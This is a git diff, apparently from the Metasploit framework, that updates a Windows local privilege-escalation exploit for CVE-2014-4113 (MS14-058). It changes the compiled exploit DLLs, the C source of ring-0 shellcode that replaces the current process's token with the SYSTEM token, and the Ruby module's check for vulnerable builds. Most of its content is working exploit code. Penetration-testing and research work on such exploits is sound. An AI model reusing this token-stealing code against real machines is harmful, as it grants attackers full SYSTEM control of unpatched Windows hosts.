diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll index 2b83c1358c..24ccff32fc 100755 Binary files a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll and b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll differ diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll index e2d5aa76bc..fd71f95119 100755 Binary files a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll and b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll differ diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c index 1c59213cfe..d81d9d224c 100755 --- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c +++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c @@ -38,7 +38,7 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)( OUT PVOID Process ); -typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)( +typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)( _Inout_ PVOID Process ); @@ -137,7 +137,7 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void) // Search the specified data structure for a member with CurrentValue. -BOOL FindAndReplaceMember(PDWORD Structure, +BOOL find_and_replace_member(PDWORD Structure, DWORD CurrentValue, DWORD NewValue, DWORD MaxSize) @@ -146,8 +146,11 @@ BOOL FindAndReplaceMember(PDWORD Structure, // Microsoft QWORD aligns object pointers, then uses the lower three // bits for quick reference counting. +#ifdef _M_X64 + Mask = ~0xf; +#else Mask = ~7; - +#endif // Mask out the reference count. CurrentValue &= Mask; @@ -174,11 +177,11 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four) pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo); pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo); - TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo); - SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo); + TargetToken = pPsReferencePrimaryToken(pMyProcessInfo); + SystemToken = pPsReferencePrimaryToken(pSystemInfo); // Find the token in the target process, and replace with the system token. - FindAndReplaceMember((PDWORD)pMyProcessInfo, + find_and_replace_member((PDWORD)pMyProcessInfo, (DWORD)TargetToken, (DWORD)SystemToken, 0x200); diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb index 474404f68f..e6a388f10c 100644 --- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb @@ -94,11 +94,7 @@ class Metasploit3 < Msf::Exploit::Local return Exploit::CheckCode::Safe if build == 9200 return Exploit::CheckCode::Safe if build == 9600 - if arch == ARCH_X86 - return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build) - else - return Exploit::CheckCode::Detected if build == 7601 - end + return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build) return Exploit::CheckCode::Unknown end